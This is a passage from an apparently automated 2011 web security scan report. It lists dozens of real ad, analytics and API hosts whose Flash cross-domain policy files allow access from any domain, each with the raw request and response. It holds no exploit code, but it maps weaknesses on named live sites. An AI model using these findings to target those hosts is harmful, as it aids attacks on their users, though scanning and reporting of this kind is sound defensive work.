Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 24 Apr 2011 19:49:22 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>


7.12. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 02:27:33 GMT
Date: Sun, 24 Apr 2011 02:27:33 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 36488

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.13. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 24 Apr 2011 15:20:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.14. http://analytic.hotelclub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.15. http://api.ak.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.ak.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: application/xml
X-FB-Server: 10.28.24.124
X-Cnection: close
Cache-Control: max-age=86400
Expires: Tue, 26 Apr 2011 00:48:17 GMT
Date: Mon, 25 Apr 2011 00:48:17 GMT
Content-Length: 280
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.16. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 01:40:11 GMT
X-FB-Server: 10.36.50.105
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.17. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.18. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sun, 24 Apr 2011 09:16:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

7.19. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.20. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.21. http://b3.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:38:19 GMT
ETag: "1630214-d0-48939f38ba8c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.22. http://beacon.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:54:33 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.23. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190954000"
Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sun, 24 Apr 2011 12:33:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.24. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sun, 24 Apr 2011 03:16:36 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.25. http://by.optimost.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Mon, 25 Apr 2011 00:48:54 GMT
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:48:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.26. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 24 Apr 2011 15:20:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.27. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web102
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sun, 24 Apr 2011 19:47:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

7.28. http://cdn.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.w55c.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Date: Sun, 24 Apr 2011 15:19:40 GMT
Server: Jetty(6.1.22)
Content-Type: application/xml
Via: 1.0 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Content-Length: 525

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...

7.29. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.30. http://consumerinfo.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumerinfo.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: consumerinfo.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288792000"
Accept-Ranges: bytes
Content-Length: 201
Date: Sun, 24 Apr 2011 19:54:34 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:53:12 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

7.31. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 24 Apr 2011 16:35:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.32. http://ctix8.cheaptickets.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ctix8.cheaptickets.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:90b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 12:09:47 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.33. http://d.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:39 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "10744f-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.34. http://data.coremetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:17 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "342dd0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=805
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.35. http://dm.de.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dm.de.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:56:38 GMT
ETag: "2040229-d0-48822406d1980"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.36. http://dogtime.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dogtime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dogtime.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 24 Apr 2011 16:45:58 GMT
Content-Type: text/xml
Content-Length: 261
Last-Modified: Thu, 21 Apr 2011 18:38:38 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
       <site-control perm
...[SNIP]...

7.37. http://ec.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Age: 486563
Date: Sun, 24 Apr 2011 12:29:09 GMT
Expires: Mon, 25 Apr 2011 21:19:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.38. http://ehg-swisscom.hitbox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-swisscom.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:51 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Sun, 24 Apr 2011 19:52:51 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

7.39. http://equfx.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://equfx.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: equfx.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:53:28 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "d85a8-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.40. http://equifaxps.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://equifaxps.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: equifaxps.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:19 GMT
Server: Omniture DC/2.0.0
xserver: www298
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.41. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sun, 24 Apr 2011 12:30:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

7.42. http://exch.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exch.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: exch.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
